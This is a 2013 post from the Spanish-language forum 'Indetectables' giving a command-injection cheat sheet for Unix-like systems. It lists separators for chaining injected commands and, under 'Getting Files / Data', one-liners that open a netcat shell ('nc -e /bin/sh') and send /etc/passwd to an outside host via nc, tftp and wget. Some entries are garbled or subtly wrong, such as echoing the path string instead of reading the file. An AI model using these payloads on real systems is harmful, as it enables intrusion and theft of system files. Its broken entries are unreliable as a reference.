Indetectables

Publicado: **18 Mar 2013, 03:48**

Like-Unix Command Injection Cheat Sheet

Un corto pero util cheat sheet de comman injection para sistemas like-unix, recordar que "blah" es nuestro comando a inyectar.

Executing Commands

Seperating Commands:

Código: Seleccionar todo

blah;blah2

PIPE:

Código: Seleccionar todo

blah | blah2

PIPEZ:

Código: Seleccionar todo

blah ^ blah2

AND:

Código: Seleccionar todo

blah && blah2

OR:

Código: Seleccionar todo

FAIL || X

OR:

Código: Seleccionar todo

blah%0Dblah2%0Dblah3

Backtick:

Código: Seleccionar todo

`blah`

Background:

Código: Seleccionar todo

`blah & blah2`

Getting Files / Data

FTP:

Código: Seleccionar todo

Make a new text, and echo and then redirect to FTP

NC:

Código: Seleccionar todo

nc -e /bin/sh

NC:

Código: Seleccionar todo

echo /etc/passwd  | nc host port

TFTP:

Código: Seleccionar todo

echo put /etc/passwd | tftp host

WGET:

Código: Seleccionar todo

wget --post-file /etc/passwd

[Enlace externo eliminado para invitados]

Indetectables

Command Injection Cheat Sheet (Like-Unix)

Command Injection Cheat Sheet (Like-Unix)